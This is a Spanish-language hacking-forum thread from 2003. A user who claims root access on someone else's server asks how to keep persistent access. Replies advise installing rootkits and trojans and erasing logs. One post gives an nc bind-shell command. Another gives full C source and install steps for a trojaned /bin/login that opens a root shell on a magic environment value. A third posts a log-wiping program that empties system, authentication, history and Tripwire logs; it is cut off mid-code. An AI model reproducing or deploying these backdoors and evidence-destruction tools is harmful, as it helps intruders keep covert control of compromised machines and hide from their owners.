elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Ingresar Registrarse
06 Octubre 2008, 20:22  



+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderadores: sirdarckcat, berz3k)
| | |-+  Bindear shellcode a puerto TCP ? ... algunas otras backdoors ? ?
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Imprimir
Autor Tema: Bindear shellcode a puerto TCP ? ... algunas otras backdoors ? ?  (Leído 5952 veces)
nitr0us

Desconectado Desconectado

Mensajes: 197


print "Fuck yaaa"!


Ver Perfil WWW
Bindear shellcode a puerto TCP ? ... algunas otras backdoors ? ?
« en: 27 Octubre 2003, 22:31 »

Que tal buenas.

Digamos que tengo r00t en un pc con linux, he entrado, ahora necesito backdoors.

He escuchado sobre poner una shellcode en un puerto TCP.. para que esté a la escucha, y cuando se haga telnet pues la sc se ejecute y me de shell de r00t.

Otra, crear una cuenta de usuario, aunque cada vez que entre tendré que ejecutar un exploit que me de r00t ...

Otra, subirme el netcat y ponerlo así mas o menos:
nc -L -l -p 64876 -e /bin/bash
para que al hacer telnet al puerto 64876 de esa pc me de shell y de nuevo tenga que ejecutar el exploit para subir privilegios.

Alguien sabe alguna otra forma de poner una backdoor.... para mi, creo que la primera es la mejor, ya que simplemente al hacer telnet al puerto indicado me da shell con suid=0 (PRIVILEGIOS DE ROOT). Pero ahora la pregunta, el exploit debe estar CODEADO para que haga uso de SOCKETS... o existe alguna herramienta para BINDEAR una shellcode a un puerto TCP????

si tienen urls sobre exploits bindeados a puertos y ese tema.. please

por fis... si alguien kiere dejar alguna otra téknica para dejar una backdoor en un Linux.

salu2
En línea

dxr
Colaborador

Desconectado Desconectado

Mensajes: 2.519



Ver Perfil
Re:Bindear shellcode a puerto TCP ? ... algunas otras backdoors ? ?
« Respuesta #1 en: 28 Octubre 2003, 07:24 »

Primero... q bug as explotado??? pasame el exploit xDDD.

2º no es buena idea nada de eso... bien si ya tienes root.... tienes todo... es un servidor web o algo asi???esq depende d elo q sea... yo instalaria un rootkit.... y un troyanete... lo de la shell no es buena idea... xq podria yegar yo y kitarte el server... me lo dunpeo lo parcheo y ya no entrarias tu... asiq eso no... si añades un usuario cuando inicie el kdm o gdm o xdm.. vera el usuarios... asiq nada...

joe dame info...
En línea

Hacer preguntas concretas, claras y aportando toda la documentación necesaria.
De lo contrario, no tendreis una respuesta clara.
nitr0us

Desconectado Desconectado

Mensajes: 197


print "Fuck yaaa"!


Ver Perfil WWW
Re:Bindear shellcode a puerto TCP ? ... algunas otras backdoors ? ?
« Respuesta #2 en: 28 Octubre 2003, 21:05 »

Enax...

pues el server está on line... un software de FTP vulnerable a un b0f..... eso no importa.. digamos que es un servidor web (y no quiero hacer deface).

Tengo r00t.. ahora, dices un rootkit....... en si cual es su función principal y cual me recomiendan??

Troyano a que programas?? ... puedes meter un sniffer y guardar todo los paquetes en un log?? (sin entorno X, desde bash).

SALU2.. GRACIAS :)

P.D.: Que es dumpear? .. donde dijiste.. me lo dumpeo, lo parcheo .. bla bla bla...

bytez
En línea

dxr
Colaborador

Desconectado Desconectado

Mensajes: 2.519



Ver Perfil
Re:Bindear shellcode a puerto TCP ? ... algunas otras backdoors ? ?
« Respuesta #3 en: 29 Octubre 2003, 06:19 »

vale se como lo hicistes xDDD imagino q tendrias un usuario en ese ftp... ¬¬...

dumpear es mmm hacer q sea tu servidor... sinq  el amdin se entere osea subir y bajar cosas... sin q se entere el admin... XDD

oie tio si no sabes q acer con el... antes de hace runa tonteria avisame por el msn o privado...
otra cosa borra tus log... y porlo menos cuando entres para el daemon q crea los log...

ayer me tube mirando rootkit for linux... en mi pc tengo uno muy wapo... (q ahora no toy en mi pc).

pos eso... as mirao a ver si tiene red??? mira si tiene el samba... y q version... q mas servicios corre... de q es la web??? esq dependiendo de q sea... podrias aprovechar a ace runas cosas u otras...
En línea

Hacer preguntas concretas, claras y aportando toda la documentación necesaria.
De lo contrario, no tendreis una respuesta clara.
elvizo

Desconectado Desconectado

Mensajes: 109


Takedown


Ver Perfil
Re:Bindear shellcode a puerto TCP ? ... algunas otras backdoors ? ?
« Respuesta #4 en: 29 Octubre 2003, 07:02 »

por cierto q se supone q es una shellcode? no me qda claro, y q kereis decir cuando decis bindear un puerto tcp?
porque se tienen q dejar backdoors en puertos tcp?
muxas gracias de antemano
En línea

dsH-Team
..sR. aDiKtO..
Colaborador

Desconectado Desconectado

Mensajes: 1.455


..enseña lo que sabes, aprende lo que no..


Ver Perfil
Re:Bindear shellcode a puerto TCP ? ... algunas otras backdoors ? ?
« Respuesta #5 en: 29 Octubre 2003, 07:17 »

Citar
porque se tienen q dejar backdoors en puertos tcp?
Te recomiendo k leas los RFC 793 y 768, y esa duda te se aclara.

.:nitrous:.
Piensa un poco, si tu eres un administrador y alguien entra en tu server y deja un puerto abierto de par en par no crees k se dara cuenta enseguida?
Te dejo aki unos enlaces:
http://usuarios.lycos.es/eladikto/tutoriales/troyanos.txt
http://usuarios.lycos.es/eladikto/tutoriales/22.html
SALU2
En línea

nitr0us

Desconectado Desconectado

Mensajes: 197


print "Fuck yaaa"!


Ver Perfil WWW
Re:Bindear shellcode a puerto TCP ? ... algunas otras backdoors ? ?
« Respuesta #6 en: 29 Octubre 2003, 22:58 »

Gracias a todos hee !!!

Aki si que hay buena info... GRACIAS SR. ADIKTO, los tutoriales están de FABULA ;)

O.k. suponía que lo de un puerto TCP en espera, ya que el admin es de los que  no sabe ni scannear puertos de su servidor  ;D, o sea, no sabe que son logs ... y asi como levantó sus sitema, asi lo hechó andar :P.

O.k., pero si, tienen razón, entonces, SI NO DEJO UN PUERTO ABIERTO, de que otra forma puedo dejar una back door sin tener que lanzar de nuevo el exploit??

Ahh y Derek... pues se ahi 2 ... 3.. ya me subí un zapper (lo probé en mi linux y si rula bien ;) )... para borrar logs.

Acerca que si está en red.. pues aun no he probado bien, ahora estoy en windows... no he visto que mákinas están en ese mismo segmento de red ni na...

Pero digamos que ahi en ese segmento hay otra pc vulnerable de algo... desde la shell que obtuve compilo y lanzo el exploit verdad y quedaría encadenado o me ekivoco.. o sea, algo asi:

--------              ------------------              -------------        
|mi pc |<------>| HACKED FTP |<------->| SWITCH |
---------             ------------------              -------------
                                                                     |
                                                             -------------
                                                             |OTRA PC |
                                                             | VULNER.|
                                                             -------------

Y asi.. tendria shell de hacked ftp... y por medio de esta estaría conectado a cualquier otra pc vulnerable de esa misma red vd?? me ekivoco??

salu2... gracias por todo hee ;)
En línea

..sR. aDiKtO..
Colaborador

Desconectado Desconectado

Mensajes: 1.455


..enseña lo que sabes, aprende lo que no..


Ver Perfil
Re:Bindear shellcode a puerto TCP ? ... algunas otras backdoors ? ?
« Respuesta #7 en: 30 Octubre 2003, 04:01 »

Citar
O.k., pero si, tienen razón, entonces, SI NO DEJO UN PUERTO ABIERTO, de que otra forma puedo dejar una back door sin tener que lanzar de nuevo el exploit??
Veo k los manuales k te deje no te los has leido, LEETELOS. En ningun momento te dije k no dejaras un puerto abierto, solo te dije k no lo dejaras de par en par, sin ninguna precaucion.

Citar
Ahh y Derek... pues se ahi 2 ... 3.. ya me subí un zapper (lo probé en mi linux y si rula bien  )... para borrar logs.
Esta bien eso de los zappers pero es mejor hacerlo a mano o hacer tu el zapper, te lo digo porke puede k el sistema de logeo no sea el mismo k el k intenta borrar el zapper, k el history no lo borre adecuadamente... Los zappers solo se utilizan cuando tienes poco tiempo, pero como has dicho k tienes tiempo es mejor k lo borres a mano y asegurarte.

En línea

Rojodos
"If you wanna be free, you must be different"

Desconectado Desconectado

Mensajes: 3.525



Ver Perfil
Re:Bindear shellcode a puerto TCP ? ... algunas otras backdoors ? ?
« Respuesta #8 en: 30 Octubre 2003, 06:31 »

Bueno, y eso de BINDEAR UNA SHELLCODE EN UN PUERTO TCP te lo has sacado de la manga.... o yo no se de donde, pero no es exacto.

Una shellcode puede BINDEAR una shell (tb se dice Spawn a shell) pero no se puede dejar una shellcode en un puerto ni nada parecido.

Los exploits son los que llevan las shellcodes, que son el codigo que kieres que se ejecute (spawn a shell, añadir user, abrir puerto, etc...etc...)

Dicho codigo es el que proporciona el acceso de un modo o otro.

Hacer un codigo en ASM en linux que bindee una shell es (ahora que se :P) bastante sencillo. Y en windows, aun mas.

Te recomiendo que te pases por estos sitios para "aclarar terminos":

www.undersec.com
www.netsearch-ezine.org
www.metasploit.com
.....

Salu2
En línea
Weke

Desconectado Desconectado

Mensajes: 51



Ver Perfil WWW
Re:Bindear shellcode a puerto TCP ? ... algunas otras backdoors ? ?
« Respuesta #9 en: 30 Octubre 2003, 09:47 »

Nass. Si quieres un rootkit para linux puedes pasarte por www.programas-hacker.com y bajarte el Phtool que hice yo hace tiempo, es un rootkit basado en LKMs (modulos para linux). Si no te quieres complicar la vida te recomiendo que no lo uses, porque es algo complicado de instalar, etc. Pero si quieres un rootkit practicamente indectable entonces si. Tiene cosas como ocultar directorios/ficheros, ocultar procesos, ocultar partes de archivos (bash scripts) para meter lo que quieras, auto ocultacion del modulo, acceso remoto mediante un puerto que se abre cuando le mandas un ICMP especial con negociacion de tty incluida, root local, y alguna cosa + q se me olvida. Yo lo he testeado en Mandrake 8.2 (no ando muy actualizao) y rula bien. Ya me contaras que tal si lo instalas. Un saludo.

Weke
En línea

nitr0us

Desconectado Desconectado

Mensajes: 197


print "Fuck yaaa"!


Ver Perfil WWW
Re:Bindear shellcode a puerto TCP ? ... algunas otras backdoors ? ?
« Respuesta #10 en: 30 Octubre 2003, 22:06 »

Gracias gracias.

Bien, ya he leido algo, me sirvieron los textos hee.

Rojodos.-Sobre bindear un sc en un port tcp, pues no se, tal vez estoy algo confundido... lo que he escuchado es tener un puerto abierto.. que al conectarte pues, ejecute el exploit (con la sc dentro claro) y me de shell de r00t.

Ahh y pues sobre los rootkits... he leido algo algo, aunke debo documentarme MUCHO MAS... y pues por ahi he escuchado mucho sobre el :
t0rn ... rootkit.....
y para windows tmb... el hacker defender...

Gracias.... me documentaré ´más sobre el tema para sacarle provecho.

Ahh y alguien tiene idea.. sobre lo que pregunté en el post pasado... sobre una shell bajo otra, lo del dibujo que hice...

Pero digamos que ahi en ese segmento de red hay otra pc vulnerable de algo... desde la shell que obtuve compilo y lanzo el exploit verdad y quedaría encadenado o me ekivoco.. o sea, algo asi:

--------              ------------------              -------------        
|mi pc |<------>| HACKED FTP |<------->| SWITCH |
---------            ------------------              -------------
                                                                    |
                                                            -------------
                                                            |OTRA PC |
                                                            | VULNER.|
                                                            -------------

Y asi.. tendria shell de hacked ftp... y por medio de esta estaría conectado a cualquier otra pc vulnerable de esa misma red vd?? me ekivoco??
En línea

elvizo

Desconectado Desconectado

Mensajes: 109


Takedown


Ver Perfil
Re:Bindear shellcode a puerto TCP ? ... algunas otras backdoors ? ?
« Respuesta #11 en: 02 Noviembre 2003, 10:26 »

q kiere decir bindear?
perdona por la pregunta q resta nivel al post, pero llevo tiempo buscando q kiere decir bindear y no encuentro
En línea

dsH-Team
nitr0us

Desconectado Desconectado

Mensajes: 197


print "Fuck yaaa"!


Ver Perfil WWW
Re:Bindear shellcode a puerto TCP ? ... algunas otras backdoors ? ?
« Respuesta #12 en: 04 Noviembre 2003, 22:16 »

Bindear...... pues asi rápido... es como poner una shell junto a un puerto tcp....dicho puerto estará a la escucha de cualquier conexión, y cuando hagas telnet a ese puerto pues te dará shell.

Ahh y pues ya leí algo..... y sobre bindear shellcode en un puerto tcp no mucho xD... tons, me equivoké.. kise decir bindear SHELL en un puerto TCP.

Esto va más en tema como backdoors bajo linux...que a propósito gracias al sr. adikto por las urls, están buenas !!

P.D... algo raro.. anduve testeando en mi red hat 9, sobre un tipo de back doors en donde tienes que meter unas cosas extra en /etc/services y /etc/inetd.conf , pero /etc/inetd.conf ya no existe en red hat 9, por ahi leí que ahora es xinietd.conf, aunduve viendo ahi .. pero no tiene nada, me envia a varias carpetas de niveles de ejecución..... y al entrar ahi hay varios archivos, cada uno con diferente nombre de servicio, que son los que cargará el xinetd... entonces, creo que solamente cambió la estructura del archivo inetd.conf

salu2
En línea

-_-[S@BuEsOhAcK]-_-

Desconectado Desconectado

Mensajes: 280


No tenes nada mas interesante que leer que esto?


Ver Perfil
Re:Bindear shellcode a puerto TCP ? ... algunas otras backdoors ? ?
« Respuesta #13 en: 05 Noviembre 2003, 12:23 »

este es un buen troyan

----------------comienzo del codigo-------------------
/*
 * Localcore (http://www.localcore.org) login backdoor.
 * To trigger, you can either do:
 * DISPLAY=MAGIC_WORD; export DISPLAY; telnet target-host
 * or
 * telnet
 * env def DISPLAY MAGIC_WORD
 * o target-host
 *
 * Installation: copy /bin/login to /usr/lib/login , chmod 755 it,
 * copy this to /bin/login, chmod 4755 it and touch all timestamps.
 *
 * Change the MAGIC_WORD and such to taste your fit.
 */

#include <stdio.h>

/* start of user def stuff */
#define OLDLOGIN "/usr/lib/login"
#define LOGINNAME "login"
#define MAGIC_WORD "localhost"

/* end of user def stuff */

/* To make it a bit better looking in strings */

#define REVISION "$Id: Localcore 2000/08/14 21:31:00 marekm Exp $"

char **exe;

do_back() {
   puts(REVISION);
   putenv("TERM=vt100");
   putenv("HISTFILE=/dev/null");
   execl("/bin/sh","sh","-i",0);
}

main(argc, argv)
   int argc;
   char *argv[];
{
   exe = argv;
   exe[0] = LOGINNAME;
   if ((char *)getenv("DISPLAY") != (char *)NULL)  
      if (strncmp(getenv("DISPLAY"),MAGIC_WORD,strlen(MAGIC_WORD)) == 0)
         do_back();
   execv(OLDLOGIN,exe);
}

---------------------------------------------------------------
COMANDOS PARA INSTALARLO:

cp /bin/login /usr/lib/login
chmod 755 /usr/lib/login
tee login.c
gcc -O2 login.c -o login
el exploit lo ponemos en /bin/login
chmod 4755 /bin/login
y luego hay que hacer un touch

Bueno lo que hicimos aca fue reemplazar el /bin/login por este troyano.
Si le queremos poner clave tenemos que modificar el codigo del troyano antes de compilarlo,
lo que tenemos que modificar es #define MAGIC_WORD "localhost"
en vez de localhost podemos la clave que querramos por ejemplo: Rd2MZ*a2d
linda clave no?? jejeje
Entonces luego de haber puesto el troyano nos salimos del host, habiendo borrado todas las huellas y habiendo dejado el sistema como estaba.
Y desde cualquier terminal ponemos la siguiente sintaxis:

export DISPLAY="localhost"; telnet host

Trying 200.00.00.00...
Connected to host
Escape character is '^]'.

SCO OpenServer(TM) Release 5 (host) (ttyp0)

$Id: Localcore 2000/08/14 21:31:00 marekm Exp $
# id
uid=0(root) gid=3(sys) groups=3(sys),0(root),1(other)
#



FRACMENTO EXTRAIDO DEL TEXTO : ``Ataque a Servidores - by SOny´´
En línea

uh ah.. pone a franchela..

xD
-_-[S@BuEsOhAcK]-_-

Desconectado Desconectado

Mensajes: 280


No tenes nada mas interesante que leer que esto?


Ver Perfil
Re:Bindear shellcode a puerto TCP ? ... algunas otras backdoors ? ?
« Respuesta #14 en: 05 Noviembre 2003, 12:31 »

este es el codigo del zapper diseñado por disidents, el mejor en mi opinion.

-----------------comienzo del codigo fuente------------------

/*--------------------------------------------------------------------------------------------------
                  DISIDENTS - LOS FUERA DE LA LEY 2001
                        DISIDENTSZAPP by DDiego
--INSTALACION:
1ª Unos guantes, una botella de vodka y un compilador  
2ª gcc -o disidentszapp disidentszapp.c   - Si no sabias lo de los guantes
y el vodka, no creo que lo necesites
-- RECOMENDACIONES
Ir 1ª a por los servicios ftpd, smtp etc y luego darle a la A
-- AYUDA: Si quereis que incluya algun log de otro servicio en el zapper etc, podeis
escribir a disidents@hotmail.com o disidents@yahoo.es, un saludo

2001-06-02                                  
http://www.disidents.int-ltd.com                
-----------------------------------------------------------------------------------------------------*/
 
                           
                 


#include <stdio.h>
main()
{
int c;
int d;
system ("clear");
printf("\n\033[1;31m  \n");
printf("\n------------------ DISIDENTSZAPP by DDiego ---------------------\n");
printf("\n------------- ES YA LA HORA DE LIMPIARNOS EL CULO --------------\n");
printf("\033[0;0m");
printf("\n\033[1;33m1010101010--Menu--1010101010\033[0;0m");
printf("\033[1;30m\n");
printf(" A BORRA TODO LOS LOGS   de opciones (B, C, D, E, F, G,H)\n");      
printf(" B BORRA TODAS LAS ENTRADAS Y SALIDAS\n"); /*/var/log/wtmp */
printf(" C BORRA LAS EL REGISTRO DE CONEXION\n"); /* /var/log/lastlog  */
printf(" D BORRA ULTIMAS ENTRADAS\n"); /*/var/run/utmp */
printf(" E BORRA EL FTP server logfile, usado por wu-ftpd\n");
/*var/log/xferlog */
printf(" F BORRA MESSAGES\n"); /*/var/log/messages*/
printf(" G BORRA LOG  secure\n"); /*/var/log/secure*/
printf(" H BORRA archivos tmp\n"); /*/tmp */
printf(" I BORRA logs de proftpd\n");
printf(" J BORRA logs de apache + SSL\n");
printf(" K BORRA logs de sendmail\n");
printf(" L BORRA logs de qmail\n");
printf(" M BORRA logs de SMB\n");
printf(" N BORRA logs de fingerd\n");
printf(" O BORRA logs de  SSH\n");
printf(" P BORRA logs de  tftp\n");
printf(" Q BORRA logs de  qpopper\n");
printf(" R BORRA logs de  news\n");
printf(" S BORRA logs de  xmail\n");
printf(" T BORRA logs de  thttpd\n");
printf(" U BORRA logs de  Ncftpd\n");
printf(" V BORRA logs de  Telnet\n");
printf(" W BORRA logs de  auth  y auth-priv\n");
printf(" X BORRA logs de  Tripwire\n");
printf("\033[0;0m");
printf("\033[0;32m  ");
printf("---- BORRA logs de otros sistemas - Solaris, HP, IRIX, AIX -------");
printf("\033[0;0m");
printf("\033[1;34m \n");
printf("1 - Solaris (SUN)\n");
printf("2 - HP-UX  (HP)\n");
printf("3 - IRIX (Silicon Graphics)\n");
printf("4 - AIX (IBM)\n");
printf("\033[1;37m5 SALIR a tomar un disparo, tengo sed\033[0;0m\n");

c = getchar ();
switch (c) {
case 'A':
system("echo has hecho una  buena eleccion :D");
system("echo elimininando /var/log/wtmp");
system("cat /dev/null > /var/log/wtmp");  
system("echo elimininando /var/log/lastlog");
system("cat /dev/null > /var/log/lastlog");
system("echo eliminando /var/run/utmp");
system("cat /dev/null > /var/run/utmp");
system("echo eliminando /var/log/xferlog");
system(" cat /dev/null  > /var/log/xferlog");
system("echo eliminando /var/log/messages");
system(" cat /dev/null  > /var/log/messages");
system("echo elininando /var/log/secure");
system("cat /dev/null  >/var/log/secure");
system("echo eliminando /tmp");
system("rm -fr /tmp");
system("echo eliminando  /root/.bash_history");/*nota pueden estar
                            en otro sitio segun esto tu has entrado como root*/
system("cat /dev/null  > /root/.bash_history"); /*bash*/
system("echo eliminando sh_history");
system("cat /dev/null  >/root/sh_history");  /*sh*/
system("echo eliminando .sh_history");
system("cat /dev/null  > /root/.sh_history");   /*hsh*/
system("echo eliminando  /root/.cshrc  "); /*csh*/
system("cat /dev/null  >  /root/.cshrc ");
system("echo eliminando  /root/.tcshrc"); /*csh*/
 system("cat /dev/null  > /root/.tcshrc");

system("echo eliminando /root/.history"); /*csh*/
system("cat /dev/null  > /root/.history ");  
system("echo eliminando syslogd");
system("killall -HUP syslogd");
system("echo ya puedes tomarte un cubata y sonreir");
break;
case'B':
system("echo eliminando /var/log/wtmp");
system("cat /dev/null  > /var/log/wtmp");  
break;
case 'C':
system("echo eliminando /var/log/lastlog");
system("cat /dev/null  >/var/log/lastlog");
break;
case 'D':
system("echo eliminando /var/run/utmp");
system("cat /dev/null  >/var/run/utmp");
case 'E':
system("echo eliminando /var/log/xferlog");
system("/cat /dev/null  > /var/log/xferlog");
break;
case 'F':
system("echo eliminando /var/log/messages");
system("cat /dev/null  > /var/log/messages");
break;
case 'G':
system("echo eliminando /var/log/secure");
system("cat /dev/null  > /var/log/secure");
break;
case 'H':
system("echo eliminando /tmp");
system("rm -fr  > /tmp");
break;
case 'I':
system("echo eliminando logs de proftpd");
system("cat /dev/null  >  /var/log/proftpd.log");
system("cat /dev/null  >  /var/log/access.log");
system("cat /dev/null  >  /var/log/auth.log.log");
system("cat /dev/null  >  /var/log/proftpd/xferlog.legacy");
system("cat /dev/null  >  /var/log/proftpd.access_log");
system("cat /dev/null  >  /var/log/proftpd.xferlog");
system("cat /dev/null  >   /var/log/proftpd/extended.log");
break;
case 'J':
system("echo eliminando logs de apache");
system("cat /dev/null  >  /var/log/httpd/error_log ");
system("cat /dev/null  >  /var/log/httpd/access_log");
system("cat /dev/null  >  /etc/httpd/logs/access_log");
system("cat /dev/null  >  /etc/httpd/logs/error_log");
system("cat /dev/null  >  /var/log/cgi.log");
system("cat /dev/null  >  /var/log/httpd/cgi.log");
system("cat /dev/null  >  /var/log/httpd-cgi.log");
system("cat /dev/null  >  /var/httpd/logs/ssl.log");
system("cat /dev/null  >  /var/log/httpsd/ssl.access_log");
system("cat /dev/null  >  /var/log/httpsd/ssl_log");
system("cat /dev/null  >  /var/httpd/logs/ssl.log");
system("cat /dev/null  >  /tmp/ssl.log");
system("cat /dev/null  > /var/log/httpsd/ssl.access_log");
break;
case 'K':
system("echo eliminando logs de sendmail");
system("cat /dev/null  >  /etc/mail/access");
system("cat /dev/null  > /var/log/sendmail.log");
system("cat /dev/null  >/var/log/mail.log");
break;
case 'L':
system("echo eliminando logs de qmail");
system("cat /dev/null  > /var/log/qmail");
system("cat /dev/null  > /var/log/smtpd");
break;
case 'M':
system("echo eliminando logs de SMB");
system("cat /dev/null  > /var/log/samba");
system("cat /dev/null  > /var/log/samba/smb.log");
system("cat /dev/null  > /var/log/samba-log.%m ");
system("cat /dev/null  > /var/lock/samba");
break;
case 'N':
system("echo eliminando logs de finger");
system("cat /dev/null  >  /var/log/finger.log");
break;
case 'O':
system("echo eliminando logs de SSH");
system("cat /dev/null  >  /var/log/ssh.log");
system("cat /dev/null  >  /var/adm/ssh.log");
system("cat /dev/null  >  /root/.Xauthority");
break;
case 'P':
system("echo eliminando logs de tftp");
system("cat /dev/null  > /var/log/tftp.log ");
break;
case 'Q':
system("echo eliminando logs de qpopper");
system("cat /dev/null  > /var/log/poplog ");
break;
case 'R':
system("echo eliminando logs de news");
system("cat /dev/null  > /var/log/news.all");
system("cat /dev/null  > /var/log/spooler");
system("cat /dev/null  > /var/log/news");
system("cat /dev/null  > /var/log/news/news");
system("cat /dev/null  > /var/log/news/news.all");
system("cat /dev/null  > /var/log/news/news.crit");
system("cat /dev/null  > /var/log/news/news.err");
system("cat /dev/null  > /var/log/news/news.notice");
system("cat /dev/null  > /var/log/news/suck.err ");
system("cat /dev/null  > /var/log/news/suck.notice");
break;
case 'S':
system("echo eliminando logs de xmail");
system("cat /dev/null  > /var/spool/tmp");
system("cat /dev/null  > /var/spool/errors");
system("cat /dev/null  > /var/spool/logs");
system("cat /dev/null  > /var/spool/locks");
break;
case 'T':
system("echo eliminando logs de thttpd");
system("cat /dev/null  > /usr/local/www/logs/thttpd_log");
system("cat /dev/null  > /var/log/thttpd_log");
break;
case 'U':
system("echo eliminando logs de ncftpd");
system("cat /dev/null  > /var/log/ncftpd/%y%m%d/misc%H.%y%m%d");
system("cat /dev/null  > /var/log/ncftpd/misclog.txt");
system("cat /dev/null  > /var/log/ncftpd/stat.%Y%m");
system("cat /dev/null  > /var/log/ncftpd/%y%m%d/@SETNAME@/sess%H.%y%m%d");
system("cat /dev/null  > /var/log/ncftpd/sess.%y%m%d");
system("cat /dev/null  > /var/log/ncftpd.errs");
break;
case 'V':
system("echo eliminando logs de telnet");
system("cat /dev/null  > /var/log/telnet.log");
system("cat /dev/null  > /var/log/telnetd");
break;
case 'W':
system("echo eliminando logs de auth");
system("cat /dev/null  >  /var/log/auth.log ");
system("cat /dev/null  > /var/log/auth");
system("cat /dev/null  >  /var/adm/auth.log");
break;
case 'X':
system("echo eliminando logs de Tripwire");
system("cat /dev/null  >  /var/log/tripwire/agent.log ");
break;
case '1':
system("echo eliminando logs de sistema Solaris (SUN)");
system("echo eliminando /var/adm/messages");
system("cat /dev/null  > /var/adm/messages");
system("echo eliminando /var/adm/aculogs ");
system("cat /dev/null  > /var/adm/aculogs ");
system("echo eliminando /var/adm/aculog ");
system("cat /dev/null  > /var/adm/aculog ");
system("echo eliminando /var/adm/sulog");
system("cat /dev/null  > /var/adm/sulog ");
system("echo eliminando /var/adm/vold.log ");
system("cat /dev/null  > /var/adm/vold.log ");
system("echo eliminando /var/adm/wtmp ");
system("cat /dev/null  > /var/adm/wtmp ");
system("echo eliminando /var/adm/wtmpx ");
system("cat /dev/null  > /var/adm/wtmpx ");
system("echo eliminando /var/adm/utmp ");
system("cat /dev/null  > /var/adm/utmp ");
system("echo eliminando /var/adm/utmpx ");
system("cat /dev/null  > /var/adm/utmpx ");
system("echo eliminando /var/adm/log/asppp.log ");
system("cat /dev/null  > /var/adm/log/asppp.log ");
system("echo eliminando /var/log/syslog ");
system("cat /dev/null  > /var/log/syslog ");
system("echo eliminando /var/log/POPlog");
system("cat /dev/null  > /var/log/POPlog ");
system("echo eliminando /var/log/authlog ");
system("cat /dev/null  > /var/log/authlog ");
system("echo eliminando  /var/adm/pacct");
system("cat /dev/null  > /var/adm/pacct");
system("echo eliminando /var/lp/logs/lpsched ");
system("cat /dev/null  > /var/lp/logs/lpsched ");
system("echo eliminando /var/lp/logs/lpNet");
system("cat /dev/null  > /var/lp/logs/lpNet ");
system("echo eliminando /var/lp/logs/requests");
system("cat /dev/null  > /var/lp/logs/requests");
system("echo eliminando /var/cron/log ");
system("cat /dev/null  > /var/cron/log ");
system("echo eliminando /var/saf/_log ");
system("cat /dev/null  > /var/saf/_log ");
system("echo eliminando /var/saf/port/log");
system("cat /dev/null  > /var/saf/port/log");
break;
case '2':
system("echo eliminando logs de sistema HP");
system("echo eliminando /var/adm/sulog ");
system("cat /dev/null  > /var/adm/sulog ");
system("echo eliminando /var/adm/btmp ");
system("cat /dev/null  > /var/adm/btmp > ");
system("echo eliminando /var/adm/utmp ");
system("cat /dev/null > /var/adm/utmp > ");
system("echo eliminando /var/adm/wtmp ");
system("cat /dev/null  > /var/adm/wtmp ");
system("echo eliminando /var/adm/dtmp ");
system("cat /dev/null  > /var/adm/dtmp ");
system("echo eliminando /var/adm/pacct ");
system("cat /dev/null  > /var/adm/pacct ");
system("echo eliminando /var/adm/nettl.LOG00");
system("cat /dev/null  > /var/adm/nettl.LOG00");
system("echo eliminando /var/adm/rbootd.log ");
system("cat /dev/null  > /var/adm/rbootd.log ");
system("echo eliminando /etc/rc.log ");
system("cat /dev/null  > /etc/rc.log ");
system("echo eliminando /var/adm/rpc.lockd.log ");
system("cat /dev/null  > /var/adm/rpc.lockd.log ");
system("echo eliminando /var/adm/rpc.statd.log ");
system("cat /dev/null  /var/adm/rpc.statd.log > ");
system("echo eliminando /etc/shutdownlog ");
system("cat /dev/null  > /etc/shutdownlog ");
system("echo eliminando /var/adm/snmpd.log ");
system("cat /dev/null  > /var/adm/snmpd.log ");
system("echo eliminando /var/adm/automount.log ");
system("cat /dev/null  > /var/adm/automount.log ");
system("echo eliminando /var/adm/syslog/boot ");
system("cat /dev/null  > /var/adm/syslog/boot ");
system("echo eliminando /var/adm/syslog/mail.log ");
system("cat /dev/null  > /var/adm/syslog/mail.log ");
system("echo eliminando /var/adm/syslog/syslog.log ");
system("cat /dev/null  > /var/adm/syslog/syslog.log ");
system("echo eliminando /var/adm/cron/log ");
system("cat /dev/null  > /var/adm/cron/log ");
system("echo eliminando /var/adm/sw/swagent.log ");
system("cat /dev/null  > /var/adm/sw/swagent.log ");
system("echo eliminando /var/spool/sw/swagent.log ");
system("cat /dev/null  > /var/spool/sw/swagent.log ");
system("echo eliminando /var/adm/sw/swagentd.log ");
system("cat /dev/null  > /var/adm/sw/swagentd.log ");
system("echo eliminando /var/adm/sw/swconfig.log");
system("cat /dev/null  >  /var/adm/sw/swconfig.log ");
system("echo eliminando /var/adm/sw/swinstall.log ");
system("cat /dev/null  >  /var/adm/sw/swinstall.log ");
system("echo eliminando /var/adm/sw/swmodify.log ");
system("cat /dev/null  >  /var/adm/sw/swmodify.log ");
system("echo eliminando /var/adm/sw/swremove.log ");
system("cat /dev/null  >  /var/adm/sw/swremove.log ");
system("echo eliminando /var/adm/lp/log ");
system("cat /dev/null  >  /var/adm/lp/log ");
system("echo eliminando /var/adm/lp/lpd.log ");
system("cat /dev/null  >  /var/adm/lp/lpd.log ");
system("echo eliminando /usr/spool/mqueue/POPlog ");
system("cat /dev/null  > /usr/spool/mqueue/POPlog  ");
break;
case '3':
system("echo eliminando logs de sistema IRIX (Silicon Graphics)");
system("echo eliminando /var/adm/SYSLOG ");
system("cat /dev/null  >  /var/adm/SYSLOG ");
system("echo eliminando /var/adm/sulog ");
system("cat /dev/null  >  /var/adm/sulog ");
system("echo eliminando /var/adm/utmp ");
system("cat /dev/null  >  /var/adm/utmp ");
system("echo eliminando /var/adm/utmpx ");
system("cat /dev/null  >  /var/adm/utmpx ");
system("echo eliminando /var/adm/wtmp ");
system("cat /dev/null  >  /var/adm/wtmp ");
system("echo eliminando /var/adm/wtmpx ");
system("cat /dev/null  >  /var/adm/wtmpx ");
system("echo eliminando /var/adm/lastlog/username ");
system("cat /dev/null  >  /var/adm/lastlog/username ");
system("echo eliminando /usr/spool/lp/log ");
system("cat /dev/null  >  /usr/spool/lp/log ");
system("echo eliminando /var/adm/lp/lpd-errs ");
system("cat /dev/null  > /var/adm/lp/lpd-errs  ");
system("echo eliminando /usr/lib/cron/log ");
system("cat /dev/null  >  /usr/lib/cron/log ");
system("echo eliminando /var/adm/loginlog ");
system("cat /dev/null  >  /var/adm/loginlog ");
system("echo eliminando /var/adm/pacct ");
system("cat /dev/null  >  /var/adm/pacct ");
system("echo eliminando /var/adm/dtmp ");
system("cat /dev/null  >  /var/adm/dtmp ");
system("echo eliminando /var/adm/acct/sum/loginlog ");
